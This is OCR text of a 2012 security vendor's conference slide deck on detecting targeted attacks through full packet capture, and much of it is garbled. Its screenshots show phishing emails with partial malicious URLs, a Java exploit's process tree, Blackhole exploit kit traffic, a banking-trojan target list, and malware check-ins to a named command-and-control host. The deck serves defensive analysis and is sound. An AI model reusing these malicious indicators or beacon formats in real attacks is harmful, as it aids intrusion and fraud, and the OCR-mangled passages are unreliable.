6/1/2012 



CO SOLERA 

^^ NETWORKS™ 

See everything. Know everything.™ 

Preparing for the Inevitable: 

How to Fight Advanced Targeted Attacks 

with Security Intelligence and Big-Data Analytics 



Andrew Brandt 

Director of Threat Research 



J' 



§w 









3) 2012 Solera Networks. Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written consent is strictly 

prohibited. 



© SOLERA 

^^ NETWORKS™ 






See everything. Know everything.™ 






Big Data 


Little attacks 




Andrew Brandt 

Director of Threat Research 


^ ,; ' 


•S3 5 **.©? 




© 201 2 Solera Networks. Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written consent is strictly 

prohibited. 



6/1/2012 




Who I am and what I do 
• Former journalist 




(0 



SOLERA ® 201 2 Solera Networks. Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written consent is strictly 

networks prohibited. 



Who I am and what I do 

• Former journalist 

• Self-taught security enthusiast 



@SoleraBlo< w 
#AusCERT12 



(0 



SOLERA ® 201 2 Solera Networks. Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written consent is strictly 

networks prohibited. 



6/1/2012 




Who I am and what I do 

• Former journalist 

• Self-taught security enthusiast 

• Malware analyst 




CO 



SOLERA © 201 2 Solera Networks. Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written consent is strictly 

networks prohibited. 



Who I am and what I do 

• Former journalist 

• Self-taught security enthusiast 

• Malware analyst 

• Network security researcher 



@SoleraBlo< w 
#AusCERT12 



(0 



SOLERA ® 201 2 Solera Networks. Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written consent is strictly 

networks prohibited. 



6/1/2012 





Who I am and what I do 

• Former journalist 

• Self-taught security enthusiast 

• Malware analyst 

• Network security researcher 

• If you code, distribute, or use malware for gain, 
prepare for maximum mockery and humiliation. 
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I couldn't have 
said it better myself 



Little-known 

"mea culpa" feature of 

Blackshades RAT 
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@SoleraBlog 
#AusCERT12 




CO 



SOLERA ® 201 2 Solera Networks. Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written consent is strictly 

networks prohibited. 



10 



6/1/2012 




Why so touchy 







AHRttf Jtj£uH 5\ A3 J0 *f 1:40 ,0rtt | Mrtttttofc ffl*fj 



Welcome to the Threat Blog 





A little too 
close to home? 
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Today's Persistent, Blended Threats 



Communication 

s Social engineering 

s Convince victim to 
do something 

^ Visit web page 

^ Download file 

s Execute binary 
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Exploitation 

y Enumerate surface 

s Exploit vulnerability 

s Infiltrate system 

s Maintain 
connectivity 



# 



Propagation 

s Spread to other 
systems 

s Expand attack 
footprint 

• Adapt to 
countermeasures 
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The Challenge of Keeping Pace. 



I @SoleraBlog 
fcJ #AusCERT12 
#bigdata 



of breaches involved 

customized malware (no 

signature available at the 

time of exploit) 

(VzB/USSS) 



of records stolen were 

stolen using Highly 
Sophisticated Attacks 

(VzB/USSS) 



54% 87% $7.2M 



was the average cost of a 
data breach in 2011 



(Ponemon) 
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Big Data Landscape - Security Intelligence & Analytics 



U 



Context-aware and 
adaptive security will be 
the only way to securely 
support the dynamic 
business and IT 
infrastructures emerging 
during the next 1 years, j j 

—Neil MacDonald, VP & Fellow 
GARTNER 
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What does this stuff 
look like when it' s happening? 
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Would this convince you to click? 



I To: <jakei 

I Subject: Your TransUnion, Equifax, and Experian credit scores may have changed 

Date: Tue, 4 Oct 2011 1&:12:55 -0700 
I From: "Credit Check" <info@medicareaccept.com> 
I Envelope-To 




Date: Wed, 26 Oct 2011 15:19:55 +0000 

Subject: FWD: Look what i found! 

Hi friend. 

people always want to take the easy way out this allows me to 

always stay a step ahead now I dont feel something missing 
_ _ _ anymore check out what I mean 

Uear JOe L6Vy, htt p://www a m d c I u b. ru/g o . ph p?c e h i p&73fe w= msn.com 8J3 q i q a = 

_ google. com&url=abcdaily4.net/esubmit/bizopp_main.php 

Thank you for shopping with Yes Asia .coi ta ik to you soon. 

successfully placed We will process ano ui^q^i juui uiuti iuju U M ™^ 

To view details of your order go to : htt p ://www.y esa si a . co m/g I o bal/en/sec u 
order^Y4C2O11101QC34 ' 



Usemame 
Phone 

Order Number 
Payment Method 
Shipping Method 
Number of Suggested 
Shipment(s) 



Joe Levy 

(408) 745-9600 
Y4C20111010C34 
Credit Card 

Express 
1 



ttp;//www|yesasia -invQices.comf j 
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Reply to the IRS. 




: ! : Us tnttflid ifawu Sen 



nrtMOfe'rKSzr 



line 



ti*Kto *mnHrt44FBirMHftia07l^^^ 



(0 HK4^Hl^<»i>J*?MflW00>^ 3 

MtW31 k.k m dk« m »H M ^*% n ^b^.m.4fin7^r-Ui E . 7W > 

Son P utnu tiLtttJtJ 

9tai 3«kj> 



^P« tw^m 
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Seriously 
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What about one of these 




SjjUWJI^ry^ 
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from: "iiEk-ttur BuiinLMi. Buruju: :" ^run jfle* fBbbb.oi \C * 
UiIe: Wfcd, f Dec 2D11 CH:11:0:» rjoiXJ 
Iik "itih". (hili'rn.il AJuyT < -. 
■Hubjrrf: KRH [inrnpl.unt ncTw-ity nrpnrf 



Attn: Qwnef /M-#n-#ger 

Tlw ButUir luaine*i lui*f ju kii. buvn 1llmJ lhi> jJjow rufarunctid njrnjHjmr. hum one ol your jsaocuLui, | 

conch rung, (heir Ijunnwi rdjLioni- withyciu. 

IIih- ih'Lnl'. <if rhi 1 nin-junici'', ciMici'fn .ire- rtplJirwil in E-nclnuil 'ill-. 

J'li'iw- jihT ,iTtmhr>n [othn iwur .inri tntnrm *j'. about ^rxir Ttandpninr. 

Wr- f-RCQurajjp you To dirk hc-rr En antwc-r thri mrnpl.iinr. 

Wolbok rorwjid To yu-i r piu'niil ruipwH;. 
Q-riTc ■ Durness Burrm 



Council of D*her Euiir*H Bureaus 
4200 W hon flhrd. 5Hlt4 BOO 
Arlington, UA 22203-1833 
Phono: H705E 3760100 
hn: ltntM $25. Biff 
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Yeah, it' s malicious 



drive- by 
download 




foraiipljLFir. frctrn an*> nf your A«neiJ»T*t 
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Troni: "::Be1.ter Duaintii Duumu::" ^ndndjje? ffibbb.oi \C 
Dute: Wed, 7 Dec 5011 01:11:05-0800 
Tuc ■Sal'eii jTjlemal AJi-dkJ" < w '■? 

Subject: EDO Conipl^inL HcihnLy report 

Ann: nwnpc/Manjflpr 

Thtp F*n*r RLtirrfKt Bureau ha* bp*n filed shp- alUhip-rptarp-nr 

enrcorr -if; :hPir tiudn^t nelahrHK with you. 

The i-.f-triih. c J rh* r.:n? .irnpr'q crj<icpnn an* *xplain*ri in *nc\a 

Mpjmp £i.* a"*n:on :o thu icljp- and inform uiahour. ynur ( 

W? encocirdge yoj Io clult "?nre to ^niwer This campUin". 

wu ^ i*^** irt y^- ,f tod5fhnp:ff a. im. .; ■ :, : V.v^JnaM.hrtlj 

Sine ere hit 

StKielHteVM 

B?ne r EJiin«s rJur»iuj 



•: nuncil nf H>rrVr B*Klrw*vi KurrAui 
4/(N] W.ifnn Hlud, Huirr HH 
Arlington, VA 222G8 l« W 
l+ionr: UflOBkJni.DlDU- 
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Indistinguishable from normal em< 



@SoleraBlo 
#AusCERT1 



I Hcphr-TtK ":Hj:t^!i - -Jilubd(|@ - ^;i-«"d.LOir>" ■ ":Li:-i;!vK. | U-yd!(2 , >i;i-*Sid.LUin ■ 

I VjHi: hi i. lb>^p2Ul] ]&:^-:LV V-'l*:" 

I ^bftJil; Yaw Oiii-- (4-17042 1S2) !idi twer hhkkmIuU* ptaed 

I Dtiui AhntluH 

I Thank ynu for Pepping wtfl Y«**l*.oniW Q, ** ^0-1 Q***t A*^ri En«ittinn*irt ¥W# Y&tr wcV (Numfc*r 447042 122* 1m* bwn j 
I Co you -as- ■500*1 at patsibla 

I In rtra; d**ta at ywir -ardw na to hB&..'ftww vaBHEaJ^m'qtflDBl'Bru^B&jrg.^rianrj^k^j .mjiHVor dar= J fU-1 1 1 J I i 
Umtnhm jh>irasdar3natwwK&.wrn 

QkIui Number . 44H1&BL 

P^riMfll Mflmod ftradt Card x v x ^^ 

Snipping Mellnni , Ejipravs ^k. 



I Nnmhof nF iii.r g-'--1 ^hlpmnnb^j 



1 



M FV -.,> r ^^.yi^ +-I ^^ nrt VcV5«*M7S?44^]95*7*WS3?l-.HJ171 



llam Oc-vr. ripe Inn 


daulng 


No. 


unanrhy 


1 .-r|-.-rl- ;"J..ii-r..n- '.. v.-. ■-■",-n.n 


10047 IftTtJ 1 


F"rc*com Hard Dnvo J £~ External Hard Dnvo 1TD 


1004777221 




1 


Man 

TTMtlf tlQl f^f f Ml) 
QrtlAr lnul 






USE 437 98 

i . :- ::i :i i:i: 
USD 45.4-? 
LIM]4tU4f 
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.until it isn't, anymore. 



I ii>in: Urihi Dunlimi-ilion hni-iilu nu-reyly^flyebdiij com ] 
\ Sort: Mondiy. Q.rJnhnr 1D. POll 11 77 AM 

I o: J&* Lbw 
I Sub}«:i: Vkji;jtia coin Ordur CnnnrrrHlicii *Y4C20in0t0C34 



Dftflff _kw I flvy. 



r hank you rw slioppiig wfifo yi-sAsuh:ohi ** if iu m \ urilnw A^wn tnUirlyininwH Sloiu Tow wdcr has Ewcii 
^ULCvu»Tu[)f plax;iM Wte Mil urwii^a una; UiapalLri yuur ur On lu wu da sw« -as ptreaiok, L 

To new deLaib uf vswr oiikr ho to . Iiilo tfwwv vt::*a>ia tuiriW^L-cn-reture-orucrUaiAiiK] nnnP 



WOcr-Y4C20111UHK;?4*' 

U Bariums 
I YUM 

Order Numb« 
P^intinl Mrthixl 
miipp.ng r.iediod 
Numbers? kiiggpsled 
yiipirH.-iHrdj 



"^ftp . 



■ .loft L evy 

: Y4C20inaioca4 

tJtprcM 
■1 



r ^*-* frjTf*W int^r^i^ iup^^ WJDLUDlDC.iiZTp 



llem Description 
Lcyik'H 1 ! GunkC-am Ultra Vteioii 
hriM^urn Haiti Uirvo Z,f tJiCwnal Haid Urr™ fc-tOCB 



CDtoioflWo. Guanim/ unit Price <u 3D j Total [U sop 
1 DM 716^64 1 207.« 2u7.&9 

1DW1Z221 1 22fc» 22499 
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Cyber Attacks Accelerate. 



"Operation 

Aurora" 
Google 



M 



juniper 




rnckspoze 



Jan '10 



Diplomatic Cables 




fi 



VIM 



HB>Gary 



Cltl 




{NintendoJ wf 



PBS ^W"' 




nT =-^i futpa 







ustPassoxa 

-■ II W I F^.1 Fir t—wi 



M 



«dNY HMti 
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The Malware Problem - Overwhelming Odds 

"With security researchers now uncovering 
close to 100,000 new malware samples a day, 
the time and resources needed to conduct 
deep, human analysis on every piece of 
malware has become overwhelming." 

-GTISC Emerging Cyber Threats Report 2011 
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Record everything, 24/7 



Timely analysis and insight into every packet 
entering or leaving your network 




and flows from L2 - L7 



exfiltration and malware infiltration 



situational awareness 



enrichment and big data warehousing 



Flexible, open and easy-to-use platform 
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Multiple Levels of Indexing 



Packet Capture 
and Repository 
(DSFS) 




I @SoleraBlog 
^J #AusCERT12 
#bigdata 

Full fidelity, full payload 
streaming capture 

Capable of 1 0s of Gb/s data 
storage 

Support for simultaneous 
readers and writers 

Maximum throughput via smart 
streaming writes and reads 



(0 



SOLERA ® 201 2 Solera Networks - Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written consent is strictly 

networks prohibited. 



26 



13 



6/1/2012 



Multiple Levels of Indexing 




Solera DB 
Index 



i @SoleraBlog 
fcJ #AusCERT12 
#bigdata 

SoleraDB - middle layer contains 
the data necessary to find and 
reconstruct packets, flows, and 
entire network sessions in perfect 
fidelity 

Handles millions of IOPS on a 
single appliance 

Used as a "quick rejection" for the 
Packet Capture and Repository 
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Multiple Levels of Indexing 



Solera DB 
Bitmask & Hash 




I @SoleraBlog 
^J #AusCERT12 
#bigdata 

Per-attribute quick lookup layer 

Takes milliseconds to 
accept/reject hundreds of MBs of 
capture data 

Search queries are processed 
using proprietary algorithm that 
generates hash values used by 
the top layer of the search engine 
to quickly determine which 64MB 
chunks the data are in 
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Metadata Attribute Mappings 



aim_express -> Login 

aim -> f i Lename 

aim -> Login 

aim_transfer -> filename 

bittorrent -> filename 

dns -> query 

ebay -> query_raw 

ebuddy -> nickname 

edonkey -> filename 

edonkey -> login 

edonkey -> query 

facebook -> login 

facebook.mail -> email 

facebook_mai I -> receiver_emai I 

facebook_mai I -> sender_emai I 

facebook.mail -> subject 

facebook -> name 

facebook -> query_raw 

facebook -> sender_emai I 

friendster -> login 

ftp -> f i lename 

ftp -> login 

gmail -> attach.fi lename 

gmail_basic -> attach_fi lename 

gmail_basic -> login 

gmail_basic -> receiver.emai L 

gmaiLbasic -> sender.email 

gmai Lbasic -> subject 

gmai l_chat -> cal lee 

gmai Lchat -> caller 

gmai Lchat -> login 

gmail -> login 



gmai Lmobile -> login 

gmai Lmobile -> receiver.emai I 

gmai Lmobile -> sender_emai I 

gmai Lmobile -> subject 

gmail -> receiver_emai I 

gmail -> sender.email 

gmai I -> subject 

gnutel la -> f i lename 

gnutel la -> query 

google_groups -> Login 

google.groups -> member.alias 

google.maps -> query_raw 

google -> query_raw 

h225 -> callee 

h225 -> caller 

http -> filename 

http -> mime.type 

http -> part_fi lename 

http -> referer 

http -> server 

http -> uri 

http -> uri.ful I 

http -> user_agent 

imap -> attach_fi lename 

imap -> login 

imap -> mime.type 

imap -> receiver.emai I 

imap -> sender_email 

imap -> subject 

ire -> login 

ire -> nickname 

jabber -> cal lee 



jabber -> caller 
jabber -> f i lename 
jabber -> Login 
jabber -> nickname 
kazaa -> f i Lename 
kazaa -> Login 
kazaa -> mime.type 
Linkedin -> Login 
Linkedin -> receiver.emai L 
Linkedin -> sender.emai L 
linkedin -> subject 
Live.hotmai L -> attach_fi Lename 
Live.hotmai L -> Login 
Live_hotmaiL -> receiver_emai L 
Live.hotmai L -> sender_emai L 
Live.hotmaiL -> subject 
Livemai Lmobi Le -> Login 
Livemai Lmobi Le -> receiver.emai L 
Livemai Lmobi Le -> sender_emaiL 
Livemai Lmobi Le -> subject 
Lotusnotes -> attach.fi Lename 
Lotusnotes -> receiver_emai L 
Lotusnotes -> sender_emai L 
Lotusnotes -> subject 
mapi -> Login 
msn -> cal Lee 
msn -> cal Ler 
msn -> f i Lename 
msn -> Login 
msn.search -> query.raw 
myspace -> Login 
myspace -> name 



nfs 

owa 

owa 

owa 

owa 

owa 

pop3 

pop3 

pop3 

pop3 

pop3 

pop3 



myspace -> query.raw 
mysql -> query 

> f i Lename 

> attach_f i Lename 

> Login 

> receiver.emai I 

> sender_emai L 

> subject 

-> attach_fi Lename 
-> Login 
-> mime.type 
-> receiver.emai L 
-> sender_emai L 
-> subject 

postgres -> query 

radius -> Login 

rapidshare -> filename 

rapidshare -> Login 

seep -> callee 

seep -> cal Ler 

sip -> cal Lee 

sip -> cal Ler 

sip -> mime.type 

smb -> f i Lename 

smb -> Login 

smtp -> attach.fi Lename 

> Login 

> mime_type 

> receiver.emai L 

> receiver.rcptto 

> sender_emai L 

> sender_mai Lfrom 



smtp • 
smtp ■ 
smtp - 
smtp - 
smtp ■ 
smtp ■ 
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Meanwhile... CVE 2011-3544 Javasploit 



'.* You are redirecting... 



Please wait page is loading... 



[E^'firefoK.eKe 
jyjava.exe 

| plugin-container.exe 
| regsvr32.exe 

m» cmd.exe 



1 930 1 .52 ' 'C: \Prograrn Files\M ozilla Firefox\f irefox. exe' ' 

51 2 1 5.1 5 "C:\Progrann Files\Java\jre6\bin\java.exe" -D jvrin_launched=527007575 -Xbootcla 

1 228 33^33 ' 'C: \Prograrn Files\M ozilla FirefoxVplugin-container. exe' ' --channel=1 980. 1 43eac0. 23E 

94£^69 regsw32 -s C:\DD CUME^\Research\LOWLS~1V[^wpbt0.dll 
16 1 7. 1 9 "C: \WI N D WS \sy stem32\cmdejj£^^ j e j ^^^ esearch\L0 CALS "1 \1 e 




ja^payload- self-delete 
■ batch script 



CO 



Java(TM) Platform, Standard Edition [xj 



Visit us for more information at: 
http://www.java.com 
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Most Dreaded Questions from the CISO 

Who did this to us - and how? 

How long has this been going on? 

What did we lose, and when? 

Is it over yet? 

Can we be sure it won't happen again? 


, @SoleraBlog 
^J #AusCERT12 
#bigdata 


(0 solera 
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Breaches Happen 
Deal With It. 
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ee what you did the 



manrfi*arip *i#*iwi phpT>aQf,.MSYtA1rtl**3 »? 





*x*h*m6bt "*t :*ii*l item iw* 



;»Tf*i 









i "^L I- L Ji-' "L f\"*J 


i-r^ £■ 


MIW 


TTWKfl 


■flpfcrtrmvpcrf 


k?MCT 


JCWurSf < incd iM 4 




DtaUto* 


1S3MJ 


KE*CJtKrtV*'!5Mfti 


1 ?Gfifl 


wcfeibctf* rmJGv.nl 


nHHH 



MAI nrn4MmMtffltiWiMitM»di 
fern tiHici 



[HiMimi 



O 



* B » AM>f?F PCAP I Jfr F JPM* BST ClttM ^ flFfkZJWJI 




"Classic" Blackhole Exploit Kit behavior, 
malware payload delivered at the end 
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Reputation Information 



Host IP: 

Number of Incidents: 

Last Seen Date: 



192.168.0.2 

417 

2012-01-18 



| VinisTotalfor7d1326add2b0f72dbba5a1211f6aafi27 


McAfee: 


SWF/Exploit-Blacole 


NOD32: 


SWF/Expl o it. CVE-20 1 1 -0 6 1 1 .A 


Avast: 


SWF:Dropper [Heur] 


Kaspersky: 


Exploit.SWF.CVE-2011-0611.bu 


BitDefender: 


Trojan.Exploit.ANTG 


Sophos: 


Troj/SWFExp-AJ 


Comodo: 


UnclassifiedMalware 


F-3ecure: 


Trojan.Exploit.ANTG 


McAfee-GW-Edition: 


SWF/Exploit-Blacole 


Emsisoft: 


SWFDroppeNIK 


Microsoft: 


ExploitSWF/Blacole.S 


GData: 


Trojan.Exploit.ANTG 


Ikarus: 


SWF.Dropper 


Fortinet: 


W32rSWFExp.AJ!tr 



(i) SOLERA 



@SoleraBlo 
#AusCERT1 



_j I 



-»Virustotal 
-►Clam AV 
-SORBS 
-►Robtex 
-SANS ISC 
-Google SafeBrowse 
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Real-Time Extractor: Malware at the speed of light 



Delivering file-level alerting and malware 
analysis — at the network layer — to any enterprise 



Policy-based: protocol, country, MIME-type, file extension, etc. 



^^^ 


P"< 


^^^ 


SMTP! 


ftp' 


HTTP 


^^^ 


^^^ 


^^^ 



Continuous detection of all network traffic — analyze, index, alert 




Alert-triggered analysis — PDF, .js, PE, Flash, JAR, OLE, .apk, etc. 



Collapse the distributed network — leverage core security infrastructure 





CO 
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What's in your pingback' 

When malware phones home: 



@SoleraBlo 
#AusCERT1 




Exfiltrates sensitive data 



■♦SI 

-.Extracted email addresses 

-►Other documents 



Receives 

-►Instructions 

-►Links to payloads 

♦Poison pill self-deletion command 



Parameter .. 


Parameter value 


Destination host 


key 


(§Va4c34 


173.231.2.194 [play-support-email.com] 


pcuser 


Research 


173.231.2.194 [play-support-email.com] 


pcname 


SPIKE 


173.231.2.194 [play-support-email.com] 


hwid 


9C3B4DCG 


173.231.2.194 [play-support-email.com] 


country 


United States 


173.231.2.194 [play-support-email.com] 


key 


@ya4c34 


173.231 .2.194 [play-support-email.com] 
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Zbot/Spyeye Target List 



Artifact Preview 

Text Hex 



IAU w svfc'Cannect. cam w lAiJ w ga Id-Leal* 
P*/webcm/*PP*www. amegybank. com/* 

P * / wi r e s / * P *bankbyweb* P P * i n t e z ne t- ebanki ag . cam* EUEZl *treaaury . pncbank . com* P| 
P* national city, cam/ ca ns ul tnc* $ P * authmas te r . nationalcity . cam/tmgmt*P*busine, 
/express/logon, acti a n* H P * acce s s . usbank. com* HP* treasury .wamu. com* EH P * . assai 
P * cib . banko ft he west, cam* Eh] P * cma 1 . bbt . cam/ au t h* $ P * bma hai i i spi i va t ebanki ngo n. 
P^businessmanagez . corn/ signon*PP ^banking, calbanktrust. com* P* tower net. capit< 
P*/cmserver/*P* . com/Kl/*P*pub/html* (P*businessaccess . citibank. Citigroup. c< 
P "b us i ne s s cl as s a nl i ne . compas sbank . com* Eal P * cas hanal yz e r . com* ™ P * ebanki ng- s e 
PP*cbs . fiistcitizens . cam*P*banking. firsttennessee . biz*PP*efirstbank. com 1 * 
P*ibbpaweilink. com* EH™'* access . jpmoigan. cam*P*blilk. com* P *bus ines sport al .mi] 
P*mbachexpiess . com* P*piemiei: view, members united. Qzg*$P*cashmanagez .mizuho 
P P * / Commo n/ S i gnOn/ * P * / CLKCCM/ * P P *banko f ame r i ca . com* P P * onl i ne s e rV CM* P P M 
P*sandyspiingbank. cam*EI]P*ssl . selectpayment. cam/mp*PP*svbconnect. com* ! P*orB 
P*passpoit. texascapitalbank. com*P*nashvillecitizensbank. com*EalP*singlepaintH 
P*wcirr:d/wcmpw*PP*phcp/servlet*PP*webinfacus .mandtbank. com*P*wellsoffice . M 
P*businessbanking. cibc . ccir.' r is Si ^'access . rbsrr.. ccm/logon*P*bo lb-west, associated 
P*cashpio online . banko f ame rica. com*PP*cib.bankofthewest. com*PP*cmol .bbt. coiB 
P P * i f xmanage i . bnyme lion, com* P *bus i ne s smanage r . com/ s i gno n* P P *banki ng . c a lb a : 
P*/cmserver/*P* . com/Kl/*P*pub/html* (P*businessaccess . citibank. citi group. coH 
P ^business class online . compas sbank. com*EalP* cas hanal yzei . com*PP*ebanking-ser- 




Partial target list, downloaded 
by Trojan. 

Domains include those of banks 
that service business 
customers. Targets vary based 
on the victim' s location in the 
world. 

One mistaken click, by the 
wrong employee, can 
bankrupt a corporation! 



(0 SOLERA 
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When malware phones home 

Some RATs or phishing Trojans don't bother to hide their activity 




www.piayj>ayiTieot.cafTiJb3ckiip/ifTdex.pfip?acti 




Sourcejs) 




WAW.pilayiJ^ment.com/backLipfinctex 

obfuscate the data with baseE 



:«c 



a9 00 
00 30 
52 ec dl 
00 51 58 
41 47 
61 43 
2b 41 
76 63 
6f 51 
3d 



29 70 2e 






51 
32 
47 



13 ac 

3d c4 

4e 6b 61 

41 41 41 

2b 65 52 

41 41 41 

63 63 62 

64 74 59 



ca OS 00 
10 0a 64 
e2 b9 49 
6b 63 41 
41 41 41 
5a 6b 47 
41 63 41 
57 4a 76 
57 6c 73 



45 00 
2e 39 
50 13 j 
41 41 ' 
41 41 
6a 77 
41 51 
4c 6e 
4c 6d 






) P . .. .E. 

d. . 

■ ■ ■ iiii). 



. . q . . . QX 


NfcafccAAA 


DOAAAAGg 


AAAAAAAA 


B/OSzaCj 


feRZk&jw 


F3Xgc+AQ 


AAAAcAAQ 


AZAHJvc2 


hhbWJvLn 


NtaXRoQG 


dtYWlsLm 


NvbQA= 
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Revealed, you are by your weird User-Agent 




Artifact Previsw 

TriJ h ■■ 




Syntax HH]htK|hEinn PtfiflT«ti 
SET / c|?2/ilr vc . yhpl kcy=3 i ^-! £l-j .;;; =Kes=fliG;:L£fJi-nnnie=fl PIF.Es 



JEoat : play fliippor^ enj.i.1 . ccm 
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Collecting Decrypted SSL Traffic 



In partnership with. 



NETRDNDWE 



Solera DS 
Appliance 



Ji 



Transparent SSL Proxy 




rWeb Browser 
(SSL Client) 



CO 



Common Control/Management 
Decrypted And Captured Traffic 



-► Non-SSL 

-* SSL 



100% encrypted traffic decrypted, 
captured, classified and indexed 

Protects against SSL-encrypted bot 
traffic or confidential information 
leakage 
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Decrypted SSL Zbot/Cridex Pingback 




Artifact Preview 

Text Hex 

username 

unknown 

l(probableGUID) in J Gcted 
| process 

3 01 03 |£ IE V! 

[5PIKE] 9C 




FQl Explorer .EXEJ13273 



very 5-60 seconds, the bot sends this SSL- 
encrypted packet to its CnC server. 

"I'm still here. Ready for orders." 
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We know where you are, malware guys 



(0 SOLERA 
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Invest in 



, not in prediction 



-Nassim Taleb, The Black Swan 



(0 
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Thank Yo 





blog.soleranetworks.com 
http ://j . mp/bigdata_auscert 

@SoleraBlog 
facebook.com/soleranetworks 
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